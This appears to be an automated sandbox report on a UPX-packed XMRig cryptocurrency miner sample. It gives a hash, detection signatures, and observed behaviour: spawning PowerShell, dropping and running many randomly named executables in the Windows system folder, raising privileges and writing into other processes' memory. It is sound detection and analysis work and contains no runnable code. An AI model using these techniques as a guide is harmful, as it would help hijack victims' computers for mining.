Malware Analysis Report

2025-04-19 17:00

Sample ID 240522-qk2qaach41
Target 31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe
SHA256 09c7214ef6b503d24aeedec2eacaf72163aed3d270cc0b887983bade874d4f3b
Tags
miner upx xmrig execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

09c7214ef6b503d24aeedec2eacaf72163aed3d270cc0b887983bade874d4f3b

Threat Level: Known bad

The file 31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

Xmrig family

XMRig Miner payload

XMRig Miner payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 13:20

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 13:20

Reported

2024-05-22 13:22

Platform

win7-20240221-en

Max time kernel

150s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\KTiikTj.exe N/A
N/A N/A C:\Windows\System\ojzCDbz.exe N/A
N/A N/A C:\Windows\System\joopXcZ.exe N/A
N/A N/A C:\Windows\System\ULyRwor.exe N/A
N/A N/A C:\Windows\System\xKDaZJL.exe N/A
N/A N/A C:\Windows\System\xzLITSS.exe N/A
N/A N/A C:\Windows\System\fExXtUj.exe N/A
N/A N/A C:\Windows\System\apYRFGp.exe N/A
N/A N/A C:\Windows\System\rdDKznI.exe N/A
N/A N/A C:\Windows\System\fMowbqv.exe N/A
N/A N/A C:\Windows\System\tEOlqnL.exe N/A
N/A N/A C:\Windows\System\wymELJz.exe N/A
N/A N/A C:\Windows\System\rslSVrA.exe N/A
N/A N/A C:\Windows\System\CTQymvh.exe N/A
N/A N/A C:\Windows\System\DoHbCaH.exe N/A
N/A N/A C:\Windows\System\kcIiPuP.exe N/A
N/A N/A C:\Windows\System\rIklBoa.exe N/A
N/A N/A C:\Windows\System\GKwKyLt.exe N/A
N/A N/A C:\Windows\System\FpgEaDw.exe N/A
N/A N/A C:\Windows\System\vAJRPkt.exe N/A
N/A N/A C:\Windows\System\YdNalBW.exe N/A
N/A N/A C:\Windows\System\TAWkIve.exe N/A
N/A N/A C:\Windows\System\SpCSNSe.exe N/A
N/A N/A C:\Windows\System\BOZpDWW.exe N/A
N/A N/A C:\Windows\System\ouvCBJc.exe N/A
N/A N/A C:\Windows\System\rFQPYLk.exe N/A
N/A N/A C:\Windows\System\QjpoHkM.exe N/A
N/A N/A C:\Windows\System\oGdWdwB.exe N/A
N/A N/A C:\Windows\System\gTHOUSB.exe N/A
N/A N/A C:\Windows\System\eZxfgdn.exe N/A
N/A N/A C:\Windows\System\lfXQeTY.exe N/A
N/A N/A C:\Windows\System\YjAqmPI.exe N/A
N/A N/A C:\Windows\System\OPVgLzY.exe N/A
N/A N/A C:\Windows\System\HkcELJo.exe N/A
N/A N/A C:\Windows\System\EvrKRiR.exe N/A
N/A N/A C:\Windows\System\mAmoAAu.exe N/A
N/A N/A C:\Windows\System\atkfxPx.exe N/A
N/A N/A C:\Windows\System\GvwVLKG.exe N/A
N/A N/A C:\Windows\System\kJavAEU.exe N/A
N/A N/A C:\Windows\System\GdVBprJ.exe N/A
N/A N/A C:\Windows\System\ghgCQUz.exe N/A
N/A N/A C:\Windows\System\ELzqPnM.exe N/A
N/A N/A C:\Windows\System\KqdAlJn.exe N/A
N/A N/A C:\Windows\System\GhoQQod.exe N/A
N/A N/A C:\Windows\System\AtMLjRH.exe N/A
N/A N/A C:\Windows\System\JhEclWt.exe N/A
N/A N/A C:\Windows\System\kbKJNaF.exe N/A
N/A N/A C:\Windows\System\icXnHZp.exe N/A
N/A N/A C:\Windows\System\DxLcRKo.exe N/A
N/A N/A C:\Windows\System\qPvwtUd.exe N/A
N/A N/A C:\Windows\System\DjwWCaA.exe N/A
N/A N/A C:\Windows\System\GspMUWC.exe N/A
N/A N/A C:\Windows\System\vbqCaNv.exe N/A
N/A N/A C:\Windows\System\DGelCUA.exe N/A
N/A N/A C:\Windows\System\znDMNZT.exe N/A
N/A N/A C:\Windows\System\YhImzqk.exe N/A
N/A N/A C:\Windows\System\yOZMMGt.exe N/A
N/A N/A C:\Windows\System\RMhEQGm.exe N/A
N/A N/A C:\Windows\System\GVXjhjf.exe N/A
N/A N/A C:\Windows\System\EaZNUZq.exe N/A
N/A N/A C:\Windows\System\rIsnEbB.exe N/A
N/A N/A C:\Windows\System\KHFgbEs.exe N/A
N/A N/A C:\Windows\System\uWeCRrf.exe N/A
N/A N/A C:\Windows\System\CvYxokP.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\dKMZQZC.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\DBEAPYP.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\AVePzXW.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\oJvpgGX.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\rmxDGxH.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\LsfZFKQ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\VjUNKCT.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\mKtOyAe.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\UTUmqRY.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\vEkkKFK.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\WCYseWR.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\RcsomWx.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\JezWoVH.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\wGlgNbA.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\XtCbdLE.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\WLpmnMM.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\srFHCWg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\oUMYOpF.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\uDwzgMK.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\qQzbGgP.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\xdnvQCx.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\TnOCSKo.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\UUtGSAM.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\ImKNfhl.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\pBuXBmB.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\ffFqnAZ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\pxiKOtY.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\yCkURrO.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\YrhkKwl.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\OSPREBC.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\mExkVmF.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\IkUiEHz.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\VZBHyvQ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\HHBYIZy.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\rCnEEhW.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\rhJyEDi.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\hjIhnHE.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\eVKAFZC.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\SNQfrsL.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\XceDxFL.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\qqfDsYu.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\gJBBHte.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\qzKAMnk.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\iewyvMw.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\KxjRXKW.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\WLRXwUu.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\HrgBrqY.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\NtfCBvF.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\aoTDZCK.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\CRHbFnm.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\XHTSLnE.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\JIgSsKS.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\kNAsDIs.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\wWxsuos.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\tIDTdlk.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\jmZOvKJ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\XGkgFiy.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\oZMJBOg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\tpDpGqg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\tcgBoNr.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\tCfBTlP.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\EfFOOZa.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\ivoZAcm.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\vQsGQvP.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2020 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\KTiikTj.exe
